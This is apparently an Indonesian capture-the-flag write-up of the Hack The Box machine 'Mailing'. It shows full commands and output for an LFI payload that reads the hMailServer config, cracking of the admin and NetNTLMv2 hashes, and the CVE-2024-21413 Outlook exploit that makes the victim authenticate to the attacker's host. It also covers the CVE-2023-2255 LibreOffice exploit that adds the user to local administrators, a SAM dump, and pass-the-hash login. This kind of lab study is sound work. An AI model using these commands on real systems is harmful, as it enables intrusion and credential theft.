📩Mailing

By replican

Mailing Windows · Easy

USer Tldr

• LFI on Port 80

• Cracking hash password of the hMailServer admin email creds

• zero click account leak outlook

Root tldr

• LibreOffice CVE-2023-2255

• Dump sam creds

User Flag

pertama kita scan pakai nmap ipnya

# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open  ssl/imap      hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-15T19:37:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds

terdapat smb,imap,pop3, dan http terbuka

lgsg aja masuk ke initial discovery ke port 80 nya kita set dlu di /etc/hosts

10.129.231.40 mailing.htb

nah kita tau ini pakai hmailserver

First user initial foothold

lgsg aja search exploitnya dan dpt kalo vuln lfi : https://www.exploit-db.com/exploits/7012

tapi pas di cek gada. lgsg aja kita coba pakai dirsearch

200    31B   http://mailing.htb/download.php

nah ada download.php lgsg kita masukin payloadnya

http://mailing.htb/download.php?file=../../../../../../../../../Program+Files+(x86)/hmailserver/Bin/hmailserver.inimailing.htb

nah di exploit db sebenrnya pakai program files doang karna program files doang itu gada 404 kita coba di x86 program files dan ada. ke download

cat hMailServer.INI
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: hMailServer.INI
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ [Directories]
   2   │ ProgramFolder=C:\Program Files (x86)\hMailServer
   3   │ DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
   4   │ DataFolder=C:\Program Files (x86)\hMailServer\Data
   5   │ LogFolder=C:\Program Files (x86)\hMailServer\Logs
   6   │ TempFolder=C:\Program Files (x86)\hMailServer\Temp
   7   │ EventFolder=C:\Program Files (x86)\hMailServer\Events
   8   │ [GUILanguages]
   9   │ ValidLanguages=english,swedish
  10   │ [Security]
  11   │ AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
  12   │ [Database]
  13   │ Type=MSSQLCE
  14   │ Username=
  15   │ Password=0a9f8ad8bf896b501dde74f08efd7e4c
  16   │ PasswordEncryption=1
  17   │ Port=0
  18   │ Server=
  19   │ Database=hMailServer
  20   │ Internal=1
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

masukin ke file buat kita crack

cat administrator.hash
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: administrator.hash
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ 841bb5acfa6779ae432fd7a4e6600ba7
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

sudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

nah kita dapet deh creds emailnya yaitu

administrator@mailing.htb:homenetworkingadministrator

Second user initial foothold

balik ke port 80 tadi dan buka instruction.pdf nya ( download tombol paling bwh )

disini kita tau kalo kita ngesend email nanti sama maya auto diliat ( kita asumsi ada bot buat auto ngeliat setiap message baru )

disini lgsg terpikirkan exploit yg baru2 ini ada di email services outlook. ( gw jg tau nya dari htb forum dikasih hint :v )

GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-VulnerabilityGitHub

GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub

lgsg aja pakai responder dan cve nya buat gaining zero click account leak

kalo yg gatau apa itu responder itu buat dpetin creds nya maya abis kita ngesend emailnya

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.45" --subject XD

[SMB] NTLMv2-SSP Client   : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:e6a1aa4dfd95ab9f:546ECAE13A0B53BB1E7F662632271430:010100000000000000E3947642A7DA01E6A5C7F43A9AF34D000000000200080032004D005300510001001E00570049004E002D00360033005A003900390041004E004F0059005100580004003400570049004E002D00360033005A003900390041004E004F005900510058002E0032004D00530051002E004C004F00430041004C000300140032004D00530051002E004C004F00430041004C000500140032004D00530051002E004C004F00430041004C000700080000E3947642A7DA0106000400020000000800300030000000000000000000000000200000B5B650195CCF25DA9E362F08460DF10A6043234F3B80DE71CD2B446A1F46FF9D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

nah di responder dapet deh creds hash nya si maya, tinggal kita crack lagi pake hashcat kali ini pakai mode 5600

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 491 MB

Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430:010100000000000000e3947642a7da01e6a5c7f43a9af34d000000000200080032004d005300510001001e00570049004e002d00360033005a003900390041004e004f0059005100580004003400570049004e002d00360033005a003900390041004e004f005900510058002e0032004d00530051002e004c004f00430041004c000300140032004d00530051002e004c004f00430041004c000500140032004d00530051002e004c004f00430041004c000700080000e3947642a7da0106000400020000000800300030000000000000000000000000200000b5b650195ccf25da9e362f08460df10a6043234f3b80de71cd2b446a1f46ff9d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:m4y4ngs4ri

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16

Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024 

dan dpet deh lgsg login pakai evil-winrm

evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri

dan ke desktop dapet user flag

Root Flag

First root initial foothold

kita cek list program files

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/"  "C:/Program Files/"        "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/27/2024   5:30 PM                Common Files
d-----          3/3/2024   4:40 PM                dotnet
d-----          3/3/2024   4:32 PM                Git
d-----         4/29/2024   6:54 PM                Internet Explorer
d-----          3/4/2024   6:57 PM                LibreOffice
d-----          3/3/2024   4:06 PM                Microsoft Update Health Tools
d-----         12/7/2019  10:14 AM                ModifiableWindowsApps
d-----         2/27/2024   4:58 PM                MSBuild
d-----         2/27/2024   5:30 PM                OpenSSL-Win64
d-----         3/13/2024   4:49 PM                PackageManagement
d-----         2/27/2024   4:58 PM                Reference Assemblies
d-----         3/13/2024   4:48 PM                RUXIM
d-----         2/27/2024   4:32 PM                VMware
d-----          3/3/2024   5:13 PM                Windows Defender
d-----         4/29/2024   6:54 PM                Windows Defender Advanced Threat Protection
d-----          3/3/2024   5:13 PM                Windows Mail
d-----          3/3/2024   5:13 PM                Windows Media Player
d-----         4/29/2024   6:54 PM                Windows Multimedia Platform
d-----         2/27/2024   4:26 PM                Windows NT
d-----          3/3/2024   5:13 PM                Windows Photo Viewer
d-----         4/29/2024   6:54 PM                Windows Portable Devices
d-----         12/7/2019  10:31 AM                Windows Security
d-----         3/13/2024   4:49 PM                WindowsPowerShell


*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt"  "C:/Program Files/LibreOffice/help/"         "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html"  "C:/Program Files/LibreOffice/license.txt"   "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE"        "C:/Program Files/LibreOffice/presets/"      "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"


======================================================================

LibreOffice 7.4 ReadMe

versi 7.4 Libreoffice : https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

fungsinya biar maya ada di group admin dan bisa ngedump creds sam

nah abis itu taruh di C:\Important Documents

Second root initial foothold

user maya jadi punya group administrator lgsg aja dump creds nya si localadmin

command : crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB         10.129.231.40   445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.129.231.40   445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.129.231.40   445    MAILING          [*] Dumping SAM hashes
SMB         10.129.231.40   445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.129.231.40   445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.129.231.40   445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.129.231.40   445    MAILING          [+] Added 6 SAM hashes to the database

dapet deh tinggal login lgi pake winrm

evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"

done, tinggal ke desktop lgi dan ada root flag